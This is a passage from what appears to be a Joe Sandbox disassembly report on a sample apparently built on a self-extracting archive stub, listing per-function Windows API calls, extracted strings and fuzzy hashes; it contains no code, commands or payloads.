                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                  • AllocConsole.KERNEL32 ref: 00280D9E
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00280DA8
                                                                                  • AttachConsole.KERNEL32(00000000), ref: 00280DAF
                                                                                  • _wcslen.LIBCMT ref: 00280DC4
                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00280DD5
                                                                                  • WriteConsoleW.KERNEL32(00000000), ref: 00280DDC
                                                                                  • Sleep.KERNEL32(00002710), ref: 00280DE7
                                                                                  • FreeConsole.KERNEL32 ref: 00280DED
                                                                                  • ExitProcess.KERNEL32 ref: 00280DF5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                  • String ID: (=*$,<*$,@*$0?*$0A*$4B*$8>*$D=*$DXGIDebug.dll$H?*$H@*$HA*$P>*$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=*$`@*$d?*$dA*$dwmapi.dll$h=*$h>*$kernel32$uxtheme.dll$|<*$|?*$|@*$<*$>*$?*$@*$A*
                                                                                  • API String ID: 1207345701-368303933
                                                                                  • Opcode ID: bb3af076aee54010333f4a554c41fc544ae3ebb7d4cdbe52a68d8bdf82fb5725
                                                                                  • Instruction ID: 35fd7cd08a79329662e056676e82740e732ec1025b372985a659872b2c33054a
                                                                                  • Opcode Fuzzy Hash: bb3af076aee54010333f4a554c41fc544ae3ebb7d4cdbe52a68d8bdf82fb5725
                                                                                  • Instruction Fuzzy Hash: EED185B1029385AFD320EF50D889B9FBAE8BF86704F50491DF68996150DFB0866CCF52

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0028C744
                                                                                    • Part of subcall function 0028B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0028B3FB
                                                                                    • Part of subcall function 0028AF98: _wcschr.LIBVCRUNTIME ref: 0028B033
                                                                                  • _wcslen.LIBCMT ref: 0028CA0A
                                                                                  • _wcslen.LIBCMT ref: 0028CA13
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0028CA71
                                                                                  • _wcslen.LIBCMT ref: 0028CAB3
                                                                                  • _wcsrchr.LIBVCRUNTIME ref: 0028CBFB
                                                                                  • GetDlgItem.USER32(?,00000066), ref: 0028CC36
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0028CC46
                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,002BA472), ref: 0028CC54
                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0028CC7F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                  • String ID: %s.%d.tmp$<br>$<($ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$(
                                                                                  • API String ID: 986293930-250077567
                                                                                  • Opcode ID: bef51b914588ffa879819d4fefa7454e077ed6c634b4d390c5fec2899431d2e9
                                                                                  • Instruction ID: 8ff5c5c2c24907b2b332a174dd5701720cfae894b9aaa982e749694d616e44f7
                                                                                  • Opcode Fuzzy Hash: bef51b914588ffa879819d4fefa7454e077ed6c634b4d390c5fec2899431d2e9
                                                                                  • Instruction Fuzzy Hash: 6BE15276911119AADF25EBA0DC85EEE73BCAF05350F5080A6F649E3080EF749F648F60
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0027DA70
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0027DA91
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0027DAAC
                                                                                    • Part of subcall function 0027C29A: _wcslen.LIBCMT ref: 0027C2A2
                                                                                    • Part of subcall function 002805DA: _wcslen.LIBCMT ref: 002805E0
                                                                                    • Part of subcall function 00281B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0027BAE9,00000000,?,?,?,0001047E), ref: 00281BA0
                                                                                  • _wcslen.LIBCMT ref: 0027DDE9
                                                                                  • __fprintf_l.LIBCMT ref: 0027DF1C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9*
                                                                                  • API String ID: 557298264-1730323904
                                                                                  • Opcode ID: 27b6c05cfacc727ab1b3b336529db8df122964d2bb6a66ba5b94f2811b46fbc1
                                                                                  • Instruction ID: e42a819d3bf4bec52c26a8db5e4eae9cef4d222bfe5ff831b0245a4a25149927
                                                                                  • Opcode Fuzzy Hash: 27b6c05cfacc727ab1b3b336529db8df122964d2bb6a66ba5b94f2811b46fbc1
                                                                                  • Instruction Fuzzy Hash: AA32F4719202199BCF25EF64CC42BEE77B4FF09704F41815AF90997281EBB19DA5CB60

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0028B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028B579
                                                                                    • Part of subcall function 0028B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028B58A
                                                                                    • Part of subcall function 0028B568: IsDialogMessageW.USER32(0001047E,?), ref: 0028B59E
                                                                                    • Part of subcall function 0028B568: TranslateMessage.USER32(?), ref: 0028B5AC
                                                                                    • Part of subcall function 0028B568: DispatchMessageW.USER32(?), ref: 0028B5B6
                                                                                  • GetDlgItem.USER32(00000068,002CFCB8), ref: 0028D4E8
                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,0028AF07,00000001,?,?,0028B7B9,002A506C,002CFCB8,002CFCB8,00001000,00000000,00000000), ref: 0028D510
                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0028D51B
                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,002A35F4), ref: 0028D529
                                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0028D53F
                                                                                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0028D559
                                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0028D59D
                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0028D5AB
                                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0028D5BA
                                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0028D5E1
                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,002A43F4), ref: 0028D5F0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                  • String ID: \
                                                                                  • API String ID: 3569833718-2967466578
                                                                                  • Opcode ID: e4bed2a651202e085ed6b27a36d1cb594b4a7ea496518e6fcd790a5b3afd15fb
                                                                                  • Instruction ID: 28e6ed48b888b9321240e7bd86f4120ee6057d4714b4ac441c0270ec964942f1
                                                                                  • Opcode Fuzzy Hash: e4bed2a651202e085ed6b27a36d1cb594b4a7ea496518e6fcd790a5b3afd15fb
                                                                                  • Instruction Fuzzy Hash: DE319E71546342ABE301EF24EC4EFAB7BACEB86705F00060AF551D61D1DB659A08CB77

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 0028D7AE
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 0028D8DE
                                                                                  • ShowWindow.USER32(?,00000000), ref: 0028D91D
                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 0028D959
                                                                                  • CloseHandle.KERNEL32(?), ref: 0028D97F
                                                                                  • ShowWindow.USER32(?,00000001), ref: 0028D9E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                  • String ID: .exe$.inf$PDu<($h($r(
                                                                                  • API String ID: 36480843-1675706169
                                                                                  • Opcode ID: 041538c7d0bd45725d65598778d851cbda58e2e75fb3a8244d58158ce5941bc1
                                                                                  • Instruction ID: c657c54a2fa608d2786f5c5e67cfe53bc508e7df078211f6d402c8c5c40566e5
                                                                                  • Opcode Fuzzy Hash: 041538c7d0bd45725d65598778d851cbda58e2e75fb3a8244d58158ce5941bc1
                                                                                  • Instruction Fuzzy Hash: CE5106785263829ADB31BF24E844BABBBE4AF42744F04081EF5C4971D1D7B09DADCB12

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00293C35,00000000,00000FA0,002D2088,00000000,?,00293D60,00000004,InitializeCriticalSectionEx,002A6394,InitializeCriticalSectionEx,00000000), ref: 00293C03
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID: api-ms-$c*)
                                                                                  • API String ID: 3664257935-2293865823
                                                                                  • Opcode ID: 69a74609656642d6f68444f3ecec3add6bb849f9e72417ea74b37b25fe39aed6
                                                                                  • Instruction ID: f845c86b78fe8c1d0b23213685f3dde4627597ad0bd4c15bd700a6ad90aafd36
                                                                                  • Opcode Fuzzy Hash: 69a74609656642d6f68444f3ecec3add6bb849f9e72417ea74b37b25fe39aed6
                                                                                  • Instruction Fuzzy Hash: CA110632A25622ABCF32CF68AC59B5D77A49F02774F250121F911FB290EB70EF1086D1

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002957FB,002957FB,?,?,?,0029ABAC,00000001,00000001,2DE85006), ref: 0029A9B5
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0029ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0029AA3B
                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0029AB35
                                                                                  • __freea.LIBCMT ref: 0029AB42
                                                                                    • Part of subcall function 00298E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00294286,?,0000015D,?,?,?,?,00295762,000000FF,00000000,?,?), ref: 00298E38
                                                                                  • __freea.LIBCMT ref: 0029AB4B
                                                                                  • __freea.LIBCMT ref: 0029AB70
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1414292761-0
                                                                                  • Opcode ID: 38a59357d5b686803409ec8c2a4bf14cc40da359b6e5e91cef55d5f9c4d4625d
                                                                                  • Instruction ID: 5486af2ba8262c5413141b746beb4407bcfca1a048a9210344e0767194e65dbe
                                                                                  • Opcode Fuzzy Hash: 38a59357d5b686803409ec8c2a4bf14cc40da359b6e5e91cef55d5f9c4d4625d
                                                                                  • Instruction Fuzzy Hash: 8451D172620316ABDF258E64CC52EBBB7AAEB64754F154628FC08D6140EB34DC60CAD2

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0028081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00280836
                                                                                    • Part of subcall function 0028081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0027F2D8,Crypt32.dll,00000000,0027F35C,?,?,0027F33E,?,?,?), ref: 00280858
                                                                                  • OleInitialize.OLE32(00000000), ref: 0028AC2F
                                                                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0028AC66
                                                                                  • SHGetMalloc.SHELL32(002B8438), ref: 0028AC70
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                  • String ID: riched20.dll$3Ro
                                                                                  • API String ID: 3498096277-3613677438
                                                                                  • Opcode ID: a3ec375bb83bd8bfddc92be9cfaed4b47b2840478b1e73d3dad243c18b0a11a7
                                                                                  • Instruction ID: fbb3581f70418e831f821989688e13b393de59190b0da25dbdfef5d58d55ca7f
                                                                                  • Opcode Fuzzy Hash: a3ec375bb83bd8bfddc92be9cfaed4b47b2840478b1e73d3dad243c18b0a11a7
                                                                                  • Instruction Fuzzy Hash: AEF049B5D01209ABCB10AFA9E8499EFFBFCEF85700F00402AA405A2241CBB45A058FA1

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00277760,?,00000005,?,00000011), ref: 0027995F
                                                                                  • GetLastError.KERNEL32(?,?,00277760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0027996C
                                                                                  • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00277760,?,00000005,?), ref: 002799A2
                                                                                  • GetLastError.KERNEL32(?,?,00277760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002799AA
                                                                                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00277760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002799F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: File$CreateErrorLast$Time
                                                                                  • String ID:
                                                                                  • API String ID: 1999340476-0
                                                                                  • Opcode ID: 3142c71c2eed08ea37c3adcd07d7b454dc582f24c755b2bb34e872b9e49be454
                                                                                  • Instruction ID: ae562c0777807d7013674cdfade82acc0e492bf0b78441e03bfe5c9103900816
                                                                                  • Opcode Fuzzy Hash: 3142c71c2eed08ea37c3adcd07d7b454dc582f24c755b2bb34e872b9e49be454
                                                                                  • Instruction Fuzzy Hash: D9312730554746EFE730DF24CC4ABDABB94BB06320F104B1DFAA9961D0D7B4A9A4CB91

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028B579
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028B58A
                                                                                  • IsDialogMessageW.USER32(0001047E,?), ref: 0028B59E
                                                                                  • TranslateMessage.USER32(?), ref: 0028B5AC
                                                                                  • DispatchMessageW.USER32(?), ref: 0028B5B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 1266772231-0
                                                                                  • Opcode ID: e7a70e0545691c67490321deeb9800962342f575e0d68203ccab2c15ce96bd99
                                                                                  • Instruction ID: 26919460f51f175317e79d062712f7fdbc93b526158a2a12bfb0a888cac12096
                                                                                  • Opcode Fuzzy Hash: e7a70e0545691c67490321deeb9800962342f575e0d68203ccab2c15ce96bd99
                                                                                  • Instruction Fuzzy Hash: B8F0A971E0212AAA8B20EBA5FC4CDDB7FACEE053917404415B509D2050EB28DA19CBB1

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetClassNameW.USER32(?,?,00000050), ref: 0028ABC2
                                                                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 0028ABF9
                                                                                    • Part of subcall function 00281FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0027C116,00000000,.exe,?,?,00000800,?,?,?,00288E3C), ref: 00281FD1
                                                                                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0028ABE9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                  • String ID: EDIT
                                                                                  • API String ID: 4243998846-3080729518
                                                                                  • Opcode ID: d1afbc244aaf922b5342c695db3ab17e2b70dcc28962a5cc7c2c4742bdeb8bed
                                                                                  • Instruction ID: b664138e6ead6c0edd8d5437cfb195ee8344f567984b9515e0caa59ee1149ffa
                                                                                  • Opcode Fuzzy Hash: d1afbc244aaf922b5342c695db3ab17e2b70dcc28962a5cc7c2c4742bdeb8bed
                                                                                  • Instruction Fuzzy Hash: 79F08936A1222977E720AA64AC09F9F77AC9B56B41F484012BA05B21C0DB60DE5186B6

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0028DBF4
                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0028DC30
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: EnvironmentVariable
                                                                                  • String ID: sfxcmd$sfxpar
                                                                                  • API String ID: 1431749950-3493335439
                                                                                  • Opcode ID: f79c8bd6ed3fb8a56deeeb811506089475581092d4915e1567ce8222d19c04aa
                                                                                  • Instruction ID: 62111c8ba296510c06b213f92e772d0049f36be29b8c7a146edb78ef262bf220
                                                                                  • Opcode Fuzzy Hash: f79c8bd6ed3fb8a56deeeb811506089475581092d4915e1567ce8222d19c04aa
                                                                                  • Instruction Fuzzy Hash: 74F0ECB6526235ABCF203F959C0ABFB7758AF16B81B040452FD89950D1DBF08964DBB0

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00279795
                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 002797AD
                                                                                  • GetLastError.KERNEL32 ref: 002797DF
                                                                                  • GetLastError.KERNEL32 ref: 002797FE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FileHandleRead
                                                                                  • String ID:
                                                                                  • API String ID: 2244327787-0
                                                                                  • Opcode ID: 15f088d37526c848dc5ea10d0ab41c5d3ba8cfd2a0eb5029c212b516f5ba18fc
                                                                                  • Instruction ID: 983c56307a03caa068d4f6a90e956878a91df8400c4f59db5fe93b462f503dea
                                                                                  • Opcode Fuzzy Hash: 15f088d37526c848dc5ea10d0ab41c5d3ba8cfd2a0eb5029c212b516f5ba18fc
                                                                                  • Instruction Fuzzy Hash: 66118270934305EBDF249F65D804A69B7A9FB42330F10C629F41E85190D7749EE4DB62
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,002940EF,00000000,00000000,?,0029ACDB,002940EF,00000000,00000000,00000000,?,0029AED8,00000006,FlsSetValue), ref: 0029AD66
                                                                                  • GetLastError.KERNEL32(?,0029ACDB,002940EF,00000000,00000000,00000000,?,0029AED8,00000006,FlsSetValue,002A7970,FlsSetValue,00000000,00000364,?,002998B7), ref: 0029AD72
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0029ACDB,002940EF,00000000,00000000,00000000,?,0029AED8,00000006,FlsSetValue,002A7970,FlsSetValue,00000000), ref: 0029AD80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 3177248105-0
                                                                                  • Opcode ID: f4c79968d877146b98d884c172fcad8a74efa3fa420ba76d17f7b769f90ff0d3
                                                                                  • Instruction ID: 6387640456eed353959f64fab34b8c556b8810a2f4756633d46047b5ca79c01c
                                                                                  • Opcode Fuzzy Hash: f4c79968d877146b98d884c172fcad8a74efa3fa420ba76d17f7b769f90ff0d3
                                                                                  • Instruction Fuzzy Hash: C501F736621323ABCF218F68EC48A577B58EF46BA27110620FD06D7650DB30DD1186F1
                                                                                  APIs
                                                                                    • Part of subcall function 002997E5: GetLastError.KERNEL32(?,002B1098,00294674,002B1098,?,?,002940EF,?,?,002B1098), ref: 002997E9
                                                                                    • Part of subcall function 002997E5: _free.LIBCMT ref: 0029981C
                                                                                    • Part of subcall function 002997E5: SetLastError.KERNEL32(00000000,?,002B1098), ref: 0029985D
                                                                                    • Part of subcall function 002997E5: _abort.LIBCMT ref: 00299863
                                                                                    • Part of subcall function 0029BB4E: _abort.LIBCMT ref: 0029BB80
                                                                                    • Part of subcall function 0029BB4E: _free.LIBCMT ref: 0029BBB4
                                                                                    • Part of subcall function 0029B7BB: GetOEMCP.KERNEL32(00000000,?,?,0029BA44,?), ref: 0029B7E6
                                                                                  • _free.LIBCMT ref: 0029BA9F
                                                                                  • _free.LIBCMT ref: 0029BAD5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorLast_abort
                                                                                  • String ID: p*
                                                                                  • API String ID: 2991157371-4114540210
                                                                                  • Opcode ID: 6a9422280c9b5b62c71e25258fce54d498f39eb6c72edf9cfea5a603b563cd39
                                                                                  • Instruction ID: 1b8b92b1945c9237edaf42aa5fc539cfd42b4aac558bcf78858fac959bb33f5f
                                                                                  • Opcode Fuzzy Hash: 6a9422280c9b5b62c71e25258fce54d498f39eb6c72edf9cfea5a603b563cd39
                                                                                  • Instruction Fuzzy Hash: 9E31493191020AAFDF11EFA8E645B9DB7F5EF41320F250099E8049B2A2EF325D60CF50
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00281043
                                                                                  • SetThreadPriority.KERNEL32(?,00000000), ref: 0028108A
